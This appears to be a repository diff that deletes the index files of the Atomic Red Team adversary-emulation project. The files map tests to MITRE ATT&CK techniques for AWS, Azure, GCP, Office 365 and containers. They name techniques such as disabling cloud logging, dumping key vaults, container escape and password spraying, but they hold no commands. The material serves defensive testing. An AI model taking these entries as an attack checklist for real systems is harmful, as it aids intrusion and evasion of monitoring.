Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"comment":"\n- AWS - Create a new IAM user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1201","score":1,"enabled":true,"comment":"\n- Examine AWS Password Policy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"comment":"\n- AWS - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- AWS - Scan for Anonymous Access to S3\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1562","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- AWS - GuardDuty Suspension or Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":6,"enabled":true,"comment":"\n- AWS - CloudTrail Changes\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n- AWS - CloudWatch Log Group Deletes\n- AWS CloudWatch Log Stream Deletes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- AWS - Create Snapshot from EBS Volume\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1580","score":2,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n- AWS - EC2 Security Group Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"comment":"\n- AWS S3 Enumeration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1648","score":1,"enabled":true,"comment":"\n- Lambda Function Hijack\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1648/T1648.md"}]},{"techniqueID":"T1651","score":1,"enabled":true,"comment":"\n- AWS Run Command (and Control)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1651/T1651.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-azure.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:Azure)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:Azure) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Azure Persistence Automation Runbook Created or Modified\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":2,"enabled":true,"comment":"\n- Azure - adding user to Azure role in subscription\n- Azure - adding service principal to Azure role in subscription\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1526","score":2,"enabled":true,"comment":"\n- Azure - Dump Subscription Data with MicroBurst\n- Azure - Enumerate common cloud services\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":2,"enabled":true,"comment":"\n- Azure - Functions code upload - Functions code injection via Blob upload\n- Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1530","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Storage Account Objects via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Dump Azure Instance Metadata from Virtual Machines\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.006","score":1,"enabled":true,"comment":"\n- Azure - Dump All Azure Key Vaults with Microburst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.006/T1555.006.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- Azure - Eventhub Deletion\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- Azure - Create Snapshot from Managed Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]},{"techniqueID":"T1619","score":3,"enabled":true,"comment":"\n- Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI\n- Azure - Scan for Anonymous Access to Azure Storage (Powershell)\n- Azure - Enumerate Azure Blobs with MicroBurst\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-gcp.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:GCP)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:GCP) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":2,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n- GCP - Create Custom IAM Role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"comment":"\n- GCP - Delete Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- GCP - Delete Bucket\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1562","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.008","score":1,"enabled":true,"comment":"\n- GCP - Delete Activity Event Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1578","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578/T1578.md"}]},{"techniqueID":"T1578.001","score":1,"enabled":true,"comment":"\n- GCP - Create Snapshot from Persistent Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1578.001/T1578.001.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-linux.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Office-365)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.002","score":1,"enabled":true,"comment":"\n- EXO - Full access mailbox permission granted to a user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.002/T1098.002.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.002","score":1,"enabled":true,"comment":"\n- Office365 - Remote Mail Collected\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.002/T1114.002.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"comment":"\n- Office365 - Email Forwarding\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1562","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":1,"enabled":true,"comment":"\n- office-365-Disable-AntiPhishRule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.008","score":2,"enabled":true,"comment":"\n- Office 365 - Exchange Audit Log Disabled\n- Office 365 - Set Audit Bypass For a Mailbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.008","score":1,"enabled":true,"comment":"\n- New-Inbox Rule to Hide E-mail in M365\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.008/T1564.008.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json
-1
View File
File diff suppressed because one or more lines are too long
atomics/Indexes/Indexes-CSV/azure-ad-index.csv
-1
View File
@@ -1 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
atomics/Indexes/Indexes-CSV/containers-index.csv
-21
View File
@@ -1,21 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
discovery,T1613,Container and Resource Discovery,1,Docker Container and Resource Discovery,ea2255df-d781-493b-9693-ac328f9afc3f,sh
discovery,T1613,Container and Resource Discovery,2,Podman Container and Resource Discovery,fc631702-3f03-4f2b-8d8a-6b3d055580a1,sh
discovery,T1046,Network Service Discovery,9,Network Service Discovery for Containers,06eaafdb-8982-426e-8a31-d572da633caa,sh
credential-access,T1552.007,Kubernetes List Secrets,1,List All Secrets,31e794c4-48fd-4a76-aca4-6587c155bc11,bash
credential-access,T1552.007,Kubernetes List Secrets,2,ListSecrets,43c3a49d-d15c-45e6-b303-f6e177e44a9a,bash
persistence,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
persistence,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
persistence,T1136.001,Create Account: Local Account,10,Create a Linux user via kubectl in a Pod,d9efa6c7-6518-42b2-809a-4f2a8e242b9b,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
privilege-escalation,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
privilege-escalation,T1611,Escape to Host,1,Deploy container using nsenter container escape,0b2f9520-a17a-4671-9dba-3bd034099fff,sh
privilege-escalation,T1611,Escape to Host,2,Mount host filesystem to escape privileged Docker container,6c499943-b098-4bc6-8d38-0956fc182984,sh
privilege-escalation,T1611,Escape to Host,3,Privilege Escalation via Docker Volume Mapping,39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4,sh
execution,T1053.007,Kubernetes Cronjob,1,ListCronjobs,ddfb0bc1-3c3f-47e9-a298-550ecfefacbd,bash
execution,T1053.007,Kubernetes Cronjob,2,CreateCronjob,f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3,bash
execution,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
execution,T1609,Kubernetes Exec Into Container,1,ExecIntoContainer,d03bfcd3-ed87-49c8-8880-44bb772dea4b,bash
execution,T1609,Kubernetes Exec Into Container,2,Docker Exec Into Container,900e2c49-221b-42ec-ae3c-4717e41e6219,bash
defense-evasion,T1610,Deploy a container,1,Deploy Docker container,59aa6f26-7620-417e-9318-589e0fb7a372,bash
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 discovery T1613 Container and Resource Discovery 1 Docker Container and Resource Discovery ea2255df-d781-493b-9693-ac328f9afc3f sh
3 discovery T1613 Container and Resource Discovery 2 Podman Container and Resource Discovery fc631702-3f03-4f2b-8d8a-6b3d055580a1 sh
4 discovery T1046 Network Service Discovery 9 Network Service Discovery for Containers 06eaafdb-8982-426e-8a31-d572da633caa sh
5 credential-access T1552.007 Kubernetes List Secrets 1 List All Secrets 31e794c4-48fd-4a76-aca4-6587c155bc11 bash
6 credential-access T1552.007 Kubernetes List Secrets 2 ListSecrets 43c3a49d-d15c-45e6-b303-f6e177e44a9a bash
7 persistence T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
8 persistence T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
9 persistence T1136.001 Create Account: Local Account 10 Create a Linux user via kubectl in a Pod d9efa6c7-6518-42b2-809a-4f2a8e242b9b bash
10 privilege-escalation T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
11 privilege-escalation T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
12 privilege-escalation T1611 Escape to Host 1 Deploy container using nsenter container escape 0b2f9520-a17a-4671-9dba-3bd034099fff sh
13 privilege-escalation T1611 Escape to Host 2 Mount host filesystem to escape privileged Docker container 6c499943-b098-4bc6-8d38-0956fc182984 sh
14 privilege-escalation T1611 Escape to Host 3 Privilege Escalation via Docker Volume Mapping 39fab1bc-fcb9-406f-bc2e-fe03e42ff0e4 sh
15 execution T1053.007 Kubernetes Cronjob 1 ListCronjobs ddfb0bc1-3c3f-47e9-a298-550ecfefacbd bash
16 execution T1053.007 Kubernetes Cronjob 2 CreateCronjob f2fa019e-fb2a-4d28-9dc6-fd1a9b7f68c3 bash
17 execution T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
18 execution T1609 Kubernetes Exec Into Container 1 ExecIntoContainer d03bfcd3-ed87-49c8-8880-44bb772dea4b bash
19 execution T1609 Kubernetes Exec Into Container 2 Docker Exec Into Container 900e2c49-221b-42ec-ae3c-4717e41e6219 bash
20 defense-evasion T1610 Deploy a container 1 Deploy Docker container 59aa6f26-7620-417e-9318-589e0fb7a372 bash
21 defense-evasion T1612 Build Image on Host 1 Build Image On Host 2db30061-589d-409b-b125-7b473944f9b3 sh
atomics/Indexes/Indexes-CSV/google-workspace-index.csv
-5
View File
@@ -1,5 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
3 privilege-escalation T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
4 initial-access T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
5 persistence T1078.004 Valid Accounts: Cloud Accounts 1 Creating GCP Service Account and Service Account Key 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e sh
atomics/Indexes/Indexes-CSV/iaas-index.csv
-57
View File
@@ -1,57 +0,0 @@
Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,46,AWS - GuardDuty Suspension or Deletion,11e65d8d-e7e4-470e-a3ff-82bc56ad938e,bash
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,1,AWS - CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,2,Azure - Eventhub Deletion,5e09bed0-7d33-453b-9bf3-caea32bff719,powershell
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,4,AWS - Disable CloudTrail Logging Through Event Selectors using Stratus,a27418de-bdce-4ebd-b655-38f11142bf0c,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,5,AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus,22d89a2f-d475-4895-b2d4-68626d49c029,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,6,AWS - Remove VPC Flow Logs using Stratus,93c150f5-ad7b-4ee3-8992-df06dec2ac79,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,7,AWS - CloudWatch Log Group Deletes,89422c87-b57b-4a04-a8ca-802bb9d06121,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,8,AWS CloudWatch Log Stream Deletes,33ca84bc-4259-4943-bd36-4655dc420932,sh
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,10,GCP - Delete Activity Event Log,d56152ec-01d9-42a2-877c-aac1f6ebe8e6,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,1,AWS - Create Snapshot from EBS Volume,a3c09662-85bb-4ea8-b15b-6dc8a844e236,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,2,Azure - Create Snapshot from Managed Disk,89e69b4b-3458-4ec6-b819-b3008debc1bc,sh
defense-evasion,T1578.001,Modify Cloud Compute Infrastructure: Create Snapshot,3,GCP - Create Snapshot from Persistent Disk,e6fbc036-91e7-4ad3-b9cb-f7210f40dd5d,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
defense-evasion,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
credential-access,T1552.005,Unsecured Credentials: Cloud Instance Metadata API,2,Azure - Dump Azure Instance Metadata from Virtual Machines,cc99e772-4e18-4f1f-b422-c5cdd1bfd7b7,powershell
credential-access,T1552,Unsecured Credentials,1,AWS - Retrieve EC2 Password Data using stratus,a21118de-b11e-4ebd-b655-42f11142df0c,sh
credential-access,T1110.003,Brute Force: Password Spraying,9,AWS - Password Spray an AWS using GoAWSConsoleSpray,9c10d16b-20b1-403a-8e67-50ef7117ed4e,sh
credential-access,T1528,Steal Application Access Token,1,Azure - Functions code upload - Functions code injection via Blob upload,9a5352e4-56e5-45c2-9b3f-41a46d3b3a43,powershell
credential-access,T1528,Steal Application Access Token,2,Azure - Functions code upload - Functions code injection via File Share modification to retrieve the Functions identity access token,67aaf4cb-54ce-42e2-ab56-e0a9bcc089b1,powershell
credential-access,T1555.006,Credentials from Password Stores: Cloud Secrets Management Stores,1,Azure - Dump All Azure Key Vaults with Microburst,1b83cddb-eaa7-45aa-98a5-85fb0a8807ea,powershell
impact,T1485,Data Destruction,4,GCP - Delete Bucket,4ac71389-40f4-448a-b73f-754346b3f928,sh
discovery,T1580,Cloud Infrastructure Discovery,1,AWS - EC2 Enumeration from Cloud Instance,99ee161b-dcb1-4276-8ecb-7cfdcb207820,sh
discovery,T1580,Cloud Infrastructure Discovery,2,AWS - EC2 Security Group Enumeration,99b38f24-5acc-4aa3-85e5-b7f97a5d37ac,command_prompt
discovery,T1619,Cloud Storage Object Discovery,1,AWS S3 Enumeration,3c7094f8-71ec-4917-aeb8-a633d7ec4ef5,sh
discovery,T1619,Cloud Storage Object Discovery,2,Azure - Enumerate Storage Account Objects via Shared Key authorization using Azure CLI,070322a4-2c60-4c50-8ffb-c450a34fe7bf,powershell
discovery,T1619,Cloud Storage Object Discovery,3,Azure - Scan for Anonymous Access to Azure Storage (Powershell),146af1f1-b74e-4aa7-9895-505eb559b4b0,powershell
discovery,T1619,Cloud Storage Object Discovery,4,Azure - Enumerate Azure Blobs with MicroBurst,3dab4bcc-667f-4459-aea7-4162dd2d6590,powershell
discovery,T1201,Password Policy Discovery,12,Examine AWS Password Policy,15330820-d405-450b-bd08-16b5be5be9f4,sh
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
discovery,T1526,Cloud Service Discovery,2,AWS - Enumerate common cloud services,aa8b9bcc-46fa-4a59-9237-73c7b93a980c,powershell
discovery,T1526,Cloud Service Discovery,3,Azure - Enumerate common cloud services,58f57c8f-db14-4e62-a4d3-5aaf556755d7,powershell
collection,T1530,Data from Cloud Storage Object,1,AWS - Scan for Anonymous Access to S3,979356b9-b588-4e49-bba4-c35517c484f5,sh
collection,T1530,Data from Cloud Storage Object,2,Azure - Dump Azure Storage Account Objects via Azure CLI,67374845-b4c8-4204-adcc-9b217b65d4f1,powershell
persistence,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
persistence,T1136.003,Create Account: Cloud Account,1,AWS - Create a new IAM user,8d1c2368-b503-40c9-9057-8e42f21c58ad,sh
persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
persistence,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
persistence,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
persistence,T1098,Account Manipulation,17,GCP - Delete Service Account Key,7ece1dea-49f1-4d62-bdcc-5801e3292510,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
persistence,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
privilege-escalation,T1098.001,Account Manipulation: Additional Cloud Credentials,3,AWS - Create Access Key and Secret Key,8822c3b0-d9f9-4daf-a043-491160a31122,sh
privilege-escalation,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
privilege-escalation,T1098,Account Manipulation,6,Azure - adding user to Azure role in subscription,1a94b3fc-b080-450a-b3d8-6d9b57b472ea,powershell
privilege-escalation,T1098,Account Manipulation,7,Azure - adding service principal to Azure role in subscription,c8f4bc29-a151-48da-b3be-4680af56f404,powershell
privilege-escalation,T1098,Account Manipulation,17,GCP - Delete Service Account Key,7ece1dea-49f1-4d62-bdcc-5801e3292510,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
privilege-escalation,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
initial-access,T1078.004,Valid Accounts: Cloud Accounts,3,GCP - Create Custom IAM Role,3a159042-69e6-4398-9a69-3308a4841c85,sh
execution,T1651,Cloud Administration Command,1,AWS Run Command (and Control),a3cc9c95-c160-4b86-af6f-84fba87bfd30,powershell
execution,T1648,Serverless Execution,1,Lambda Function Hijack,87a4a141-c2bb-49d1-a604-8679082d8b91,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1562.001 Impair Defenses: Disable or Modify Tools 46 AWS - GuardDuty Suspension or Deletion 11e65d8d-e7e4-470e-a3ff-82bc56ad938e bash
3 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 1 AWS - CloudTrail Changes 9c10dc6b-20bd-403a-8e67-50ef7d07ed4e sh
4 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 2 Azure - Eventhub Deletion 5e09bed0-7d33-453b-9bf3-caea32bff719 powershell
5 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 4 AWS - Disable CloudTrail Logging Through Event Selectors using Stratus a27418de-bdce-4ebd-b655-38f11142bf0c sh
6 defense-evasion T1562.008 Impair Defenses: Disable Cloud Logs 5 AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus 22d89a2f-d475-4895-b2d4-68626d49c029 sh
